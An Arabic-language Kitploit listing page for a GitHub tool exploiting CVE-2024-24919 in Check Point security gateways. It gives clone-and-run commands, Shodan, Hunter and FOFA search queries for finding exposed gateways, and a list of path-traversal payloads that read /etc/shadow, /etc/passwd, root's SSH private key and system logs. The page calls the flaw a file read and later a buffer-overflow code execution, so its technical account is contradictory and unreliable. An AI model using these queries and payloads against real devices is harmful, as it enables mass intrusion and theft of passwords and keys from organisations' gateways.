Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-24919 — استغلال CVE-2024-24919 | Kitploit
أدوات/GitHubGitHub/goatsecurity/cve-2024-24919
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

استغلال CVE-2024-24919

عرض المستودع
2011منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال RCE لبوابة Check Point الأمنية (CVE-2024-24919)

نظرة عامة

يحتوي هذا المستودع على أداة لاستغلال ثغرة CVE-2024-24919 في بوابات Check Point الأمنية. الأداة عبارة عن ماسح متعدد يمكنه تحديد الأجهزة المعرضة للخطر، كما تعمل كأداة استغلال ضد هدف واحد للسيطرة الكاملة على الجهاز المصاب.

CVE-2024-24919 هي ثغرة كشف معلومات شديدة الخطورة تسمح للمهاجم بقراءة ملفات عشوائية عن بُعد على بوابة Check Point الأمنية. يمكن استغلال هذه الثغرة لسرقة معلومات حساسة مثل كلمات المرور وملفات الإعدادات.

إخلاء مسؤولية:

هذه الأداة مقدمة لأغراض تعليمية فقط. لا ينبغي استخدامها لمهاجمة الأنظمة المعرضة للخطر دون موافقة صريحة من مالكها. مؤلفو هذه الأداة غير مسؤولين عن أي أضرار قد تنجم عن استخدامها.

كيف تعمل

يعمل الاستغلال عن طريق إرسال طلب HTTP مصمم خصيصًا إلى الجهاز المعرض للخطر. يؤدي الطلب إلى حدوث تجاوز في سعة المخزن المؤقت (buffer overflow) في البرنامج الثابت للجهاز، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية. يمكن بعد ذلك استخدام الاستغلال للسيطرة الكاملة على الجهاز.

المتطلبات

  • Python 3
  • colorama
  • requests

التثبيت

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

الاستخدام

يمكنك فحص هدف واحد أو عدة أهداف!

root@kitploit:~
python cve-2024-24919.py

**Dorks **

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

** لقطة شاشة للأداة **

ss

$ مسارات الأداة : ```

root@kitploit:~
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
تنزيل الأداة